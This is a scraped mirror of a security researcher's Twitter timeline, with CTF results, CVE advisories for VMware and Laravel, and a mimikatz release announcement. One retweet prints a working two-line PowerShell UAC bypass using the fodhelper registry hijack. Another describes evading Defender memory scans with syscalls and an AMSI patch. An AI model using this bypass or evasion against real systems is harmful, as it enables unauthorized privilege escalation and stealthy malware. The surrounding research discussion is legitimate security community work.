Olivia
Online
makelarisjr
@makelarisjr
SRE @hackthebox_eu | CTF Player @0tolerance_ctf
Greece
Joined November 2015
415 Following
136 Followers
79 Posts
We've been busy this weekend! Scoring 5th place on 2 CTFs back to back. The top teams were just one challenge solve apart from each other. Thanks to both @HackPackCTF and @SecuriNets for the fun challenges!
See you at the finals.🏴🏴
New #mimikatz release to test new ts::logonpasswords feature (experimental)🥝
- Only with active users
- Only tested on 2012R2/2016/2019 + some Windows 10 LTSC
> https://t.co/Wzb5GAfWfd
* Do not hesitate to make some tests @awakecoding @jonasLyk @FuzzySec @n00py1 etc. 🤪
VMware fixed an Unauth RCE in vRealize Business for Cloud (CVE-2021-21984) found by our researcher Egor Dimitrenko.
Advisory:
https://t.co/8yY0AjWdss
Who to follow
0xdf
@0xdf_
AI Cybersecurity @ Anthropic
Potentially a legit security researcher
he/him
https://t.co/GCcLVlmdQK
https://t.co/uQWVpw4nft
0xdf on discord
chivato
@SecGus
full-time bug bounty hunter
an0n
@an0n_r0
CRT(E|O|L) | OSCP | @RingZer0_CTF 1st (for 2yrs) | HackTheBox Top10 | RPISEC MBE | Flare-On completer | GoogleCTF writeup winner | SSD research | Math MSc |🇭🇺
New year, new people, new pwning power. 1st 🥇place for our team at #wpictf! Congrats to all the teams, it was a tight race!
Check out my latest blog post detailing the "Airstrike Attack" allowing for FDE bypass and EoP on domain joined Windows workstations (CVE 2021-28316) https://t.co/NlQYhMtX6p
UAC bypass in 2 lines:
```
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
```
cmd -> fodhelper
PoC||GTFO
VMware fixed CVE-2021-21975 and CVE-2021-21983, which when chained together lead to an unauth RCE in vRealize Operations.
The vulnerabilities were found by our researcher Egor Dimitrenko.
Advisory: https://t.co/WbQwWyCuhS
https://t.co/V1D61pmt0X fixed a persistent XSS found by our researcher Igor Sak-Sakovskiy.
The vulnerability was triggered by sending a text message, resulting in an arbitrary file read or RCE on the recipient's desktop system.
https://t.co/A5Ed8GZJuR
I made a writeup for the Securinets CTF 2021 challenge Mixed since we were the only team that solved it intendedly. Not a crazy challenge but had some cool stuff in there. https://t.co/HKiYkPjU9U
Defender in memory scan -
Hasta la vista, baby! 🥳
DInvoke Syscalls to avoid hooking + Sleeps for the DLL imports. Both trigger a scan, so doing only one won´t help. Only needs an amsi.dll patch bypass before.
https://t.co/jQVYMVPpB0
Let´s see how long this will last 😬
CVE-2021-21972 on Windows deployments is SYSTEM and on Linux deployments it's only uid 1016. I got you fam.
Since the PoC for the VMware vCenter RCE (CVE-2021-21972) is now readily available, we're publishing our article covering all of the technical details.
Read the article: https://t.co/L3nms8E71o
It was all sunshine and 🌈 until the soul of an ambitious weatherman got trapped by an evil 🧙♀️.
You still have time to hack your way in @hackthebox_eu and claim the first🩸for my #Web challenge #WeatherApp.
#HackTheBox #BugBounty #BugBountyTips
I just came across a writeup for a task I made with @makelarisjr for HTB x UNI CTF. The challenge consists of phar deserialization to RCE using an image polyglot of a POP chain that affects Laravel. The theme is a reference to Mr Robot's Midland City.
https://t.co/YxbSsc06VY
Learn how we exploited a tricky #vulnerability to get remote code execution on #Laravel #php framework, when in debug mode.
https://t.co/tZAtHhO4WD
@NRockhouse wrote a nice writeup for a challenge I made with @makelarisjr for the HTB x UNI CTF. The challenge consists of jku claim misuse due to URL parsing inconsistencies and session fixation via response splitting resulting in CSP policy injection.
https://t.co/CLTMDiWYxh
NEW #HTB #ProLab is OUT 🚨 Discover #APTLabs, the ultimate #RedTeam challenge!
And the best part? Check out our ❄️ December Special ➡️ 50% OFF on Setup Fee for all Pro Labs!
Read the full story here 👉 https://t.co/TW8wif18Ju
#HackTheBox #Hacking #InfoSec #CyberSecurity
#HTB UNI #CTF 2020 - Quals Round is over! 🚩
Congrats to all participants, 204 Teams & 1,375 Players 👏 The TOP 3 now:
🥇 SIGINT @EdinburghUni
🥈 AptBlackboxTesters @DTUtweet
🥉 UniWA @iceuniwa
Next Step? Write-ups! ✍️ Stay tuned for the final results of the TOP 15!
#HackTheBox
Last Seen Users on Sotwe
JockTied 
Seen from Germany
Squirting on You 💦💦💦
Seen from United States
🛑Tangocu Dayı🛑
Seen from Turkey
Korean movies
Seen from Korea
BU NURMALA
Seen from Indonesia
Karim Karimo
Larry.69
Seen from United States
Türkçe Adult Çizgi Öykü Deposu
Seen from United States
Info Spiderman
Seen from Indonesia
Güneş
Seen from Turkey
Most Popular Users
Elon Musk
@elonmusk
240.5M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.3M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.5M followers
Taylor Swift
@taylorswift13
81.3M followers
Lady Gaga
@ladygaga
72.9M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.7M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.4M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.6M followers